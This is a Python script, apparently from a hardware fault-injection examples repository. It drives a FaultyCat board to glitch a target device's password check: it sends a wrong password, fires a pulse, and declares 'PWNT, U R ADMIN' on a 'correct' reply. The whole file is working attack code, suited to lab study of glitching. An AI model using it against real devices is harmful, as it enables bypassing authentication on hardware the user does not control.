Newer
Older
Hardware / FaultInjection / examples / FaultyCat / 03_password_check / attack.py
0xRoM on 11 Feb 7 KB initial commit
import sys
import time
import pexpect  # Required to handle screen sessions
import threading
from Modules import Worker

DEFAULT_COMPORT = "/dev/ttyACM0"
SCREEN_NAME = "ttyUSB0_screen"  # Replace this with the actual screen session name

# Initialize the FaultyWorker
faulty_worker = Worker.FaultyWorker()
# Shared variable to store the response from the device
device_response = None
child = None  # Global child variable

def initialize_child():
    """Initialize the global child process for the screen session."""
    global child
    child = pexpect.spawn(f'screen -x {SCREEN_NAME}', encoding='utf-8')
    child.expect(pexpect.TIMEOUT, timeout=1)  # Clear out any pre-existing buffer

def send_test_message_and_read_response():
    """Send 'ping' via screen to a serial device and check for 'correct!\\n' or 'incorrect\\n'."""
    global child

    # Send 'ping' to the screen session
    child.sendline("ping")
    sys.stdout.write("\rSent 'ping' to screen session.")
    sys.stdout.flush()

    # Wait a bit to ensure the command is processed
    time.sleep(0.5)  

    # Try reading any new output from the screen session
    try:
        response = child.read_nonblocking(size=1024, timeout=2)  # Read up to 1024 bytes of new data
        if "pong" in response:
            sys.stdout.write("\rReceived 'pong' response.")
            return True
        else:
            sys.stdout.write(f"\rReceived unexpected response: {response}")
        sys.stdout.flush()
    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()

    return False

def read_screen_output():
    """Read output from the screen session in a separate thread."""
    global device_response
    buffer = ""  # Initialize a buffer to store incoming characters

    try:
        while True:
            response = child.read_nonblocking(size=1024, timeout=2)  # Read up to 1024 bytes of new data
            buffer += response  # Append the new response to the buffer
            
            # Check if there's a complete line in the buffer
            while "\n" in buffer:
                line, buffer = buffer.split("\n", 1)  # Split the buffer at the first newline
                line = line.strip()  # Remove any leading/trailing whitespace

                # Check for specific responses
                if "incorrect!" in line:
                    #sys.stdout.write("\rReceived 'incorrect' response.")
                    device_response = 'incorrect'
                    return  # Exit the loop on incorrect response
                elif "correct" in line:
                    # Die here: Echo message, disarm device, and kill the program
                    sys.stdout.write("\nReceived 'correct' response.\n PWNT, U R ADMIN\n Disarming the device and exiting...\n")
                    sys.stdout.flush()

                    # Disarm the board
                    faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
                    faulty_worker.board_uart.close()

                    # Exit the program
                    sys.exit(0)

                else:
                    sys.stdout.write(f"\rReceived unexpected response: {line}")
                    sys.stdout.flush()

    except pexpect.exceptions.TIMEOUT:
        sys.stdout.write("\rNo response received from the screen session (timeout).")
        sys.stdout.flush()
    except Exception as e:
        sys.stdout.write(f"\rError reading from screen session: {e}")
        sys.stdout.flush()

def send_pulse_and_check_response():
    """Send a pulse and check for 'correct!\\n' or 'incorrect\\n' response in parallel."""
    global device_response
    try:
        # Wait a bit to ensure the command is processed
          

        # Send 'incorrectPassword' command to the screen session
        sys.stdout.write("\rSending 'incorrectPassword' to screen session.")
        sys.stdout.flush()
        child.sendline("incorrectPassword")
        
        time.sleep(0.35)

        # Send 'pulse' command (simulating the pulse trigger)
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_PULSE.value.encode("utf-8"))
        sys.stdout.write("\rSent pulse...")
        sys.stdout.flush()

        # Start a thread to read the screen output
        reader_thread = threading.Thread(target=read_screen_output)
        reader_thread.start()

        # Wait for the reading thread to complete
        reader_thread.join()
        
    except Exception as e:
        sys.stdout.write(f"\rError interacting with screen session during pulse: {e}")
        sys.stdout.flush()
        return False

def start_faulty_attack():
    """Send a pulse through the FaultyCat and listen for the response concurrently."""
    global child
    try:
        # Initialize the child process for screen session
        initialize_child()

        # Open FaultyCat connection
        faulty_worker.board_uart.open()
        time.sleep(0.1)
        sys.stdout.write("\rBoard connected.\n")
        sys.stdout.flush()

        # Arming the board
        sys.stdout.write("\r[*] ARMING BOARD, BE CAREFUL!\n")
        sys.stdout.flush()
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
        time.sleep(1)
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_ARM.value.encode("utf-8"))

        sys.stdout.write("\r[*] ARMED BOARD.\n")
        sys.stdout.flush()
        time.sleep(1)

        # Sending pulses and checking responses in a loop (up to 5 times)
        max_iterations = 5
        for i in range(max_iterations):
            sys.stdout.write(f"\rLoop {i+1}/{max_iterations}: Sending pulse and checking response.\n")
            sys.stdout.flush()

            # Send the test message and check for pong
            if send_test_message_and_read_response():

                max_iterations_2 = 3
                for j in range(max_iterations_2):
                    # Send pulse and check for correct/incorrect response
                    if send_pulse_and_check_response():
                        break  # Break the loop if 'correct!' is received

            # Small delay before next iteration
            time.sleep(1)

        # Disarm the board
        sys.stdout.write("\rDISARMING BOARD.                          \n")
        sys.stdout.flush()
        faulty_worker.board_uart.send(faulty_worker.board_configurator.board_commands.COMMAND_DISARM.value.encode("utf-8"))
        faulty_worker.board_uart.close()
        sys.stdout.write("\rBOARD DISARMED.\n")
        sys.stdout.flush()
    except Exception as e:
        sys.stdout.write(f"\rError: {e}\n")
        sys.stdout.flush()
    finally:
        # Make sure to clean up the child process
        if child:
            child.close()

def faulty():
    """Configure and send pulses through the FaultyCat."""
    comport = DEFAULT_COMPORT

    print("Configuring the FaultyCat...")
    print(f"Using serial port: {comport}")

    # Set the serial port
    faulty_worker.set_serial_port(comport)

    # Validate the serial connection
    if not faulty_worker.validate_serial_connection():
        print(f"Error: Could not establish connection on: {comport}")
        return

    # Start the faulty attack (send pulse)
    start_faulty_attack()

if __name__ == "__main__":
    print("Starting FaultyCat...")
    faulty()